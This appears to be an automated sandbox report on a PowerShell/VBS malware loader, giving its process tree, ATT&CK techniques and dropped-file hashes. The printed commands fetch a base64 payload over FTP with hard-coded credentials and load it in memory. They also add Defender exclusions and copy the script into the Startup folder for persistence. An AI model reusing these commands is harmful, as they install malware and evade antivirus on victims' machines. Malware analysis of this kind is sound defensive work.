Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$GAwZn;$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$CSaXQ.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$GAwZn = $CSaXQ.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$CSaXQ.dispose();$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$GAwZn = $CSaXQ.DownloadString( $GAwZn );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $GAwZn.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'elif/txt.uga/ajac5nltsd9ywkd/elif/moc.erifaidem.www//:sptth' , $hzwje , 'true1' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4480
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3884
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
      4⤵
      PID:5016
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4872
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4992
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1468
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4808
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:976
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3284
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4964
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4300
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4040
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:220
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:5028
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3944
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4752
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3020
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4940
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1184
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:5100
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4352
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4360
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:5092
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:436
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3672
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1512
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2076
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3640
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2384
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4112
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3780
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3776
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4576
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3040
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2784
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2720
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3032
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2296
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2888
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4480
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1932
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1000
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1652
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:3324
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:948
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2808
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4340
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4264
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:2232
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:740
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:4708
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
      4⤵
      PID:1180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
00090825b13da9dacef863ea6eb5359e

SHA1
d9e10f50df4c1ef733af679acd2cf735b35474cd

SHA256
bf38fb2da3513b6555ed2550a2c663f4259d2761503dad2bfb3f1d97e0dde675

SHA512
8eef724f47db8d8604d74ab102796053f34ce7bd65a2da1949cb4f95e8c7137645f98a1afe5ca8306787e09b2f3d2a61315b9802dda0f27d3754e221e3bafc5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.txt

Filesize
355B

MD5
daa58b938ebe73e880b2cdd8704c6301

SHA1
857c5eaf94dfeb56ba44ac70685c6787a846549c

SHA256
50bae474c92c50383c3e65183eed42e3c05d134b0baf0f5cf6f8095f362f5ee6

SHA512
53d127cf5afe697a77b9ff1658673295be80fbbcc24e8fa5b28d39ce7dd158ddfe1d7e756f189280fb965881a6ff1764ddb0e74325eb24574b1cb466039e999e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a4qm22c5.1pj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3152-0-0x00007FFDF29C3000-0x00007FFDF29C5000-memory.dmp

Filesize
8KB

Download
memory/3152-1-0x000001C76FAD0000-0x000001C76FAF2000-memory.dmp

Filesize
136KB

Download
memory/3152-11-0x00007FFDF29C0000-0x00007FFDF3481000-memory.dmp

Filesize
10.8MB

Download
memory/3152-12-0x00007FFDF29C0000-0x00007FFDF3481000-memory.dmp

Filesize
10.8MB

Download
memory/3152-58-0x00007FFDF29C3000-0x00007FFDF29C5000-memory.dmp

Filesize
8KB

Download
memory/3152-59-0x00007FFDF29C0000-0x00007FFDF3481000-memory.dmp

Filesize
10.8MB

Download
memory/3696-22-0x000001A3186A0000-0x000001A3186AA000-memory.dmp

Filesize
40KB

Download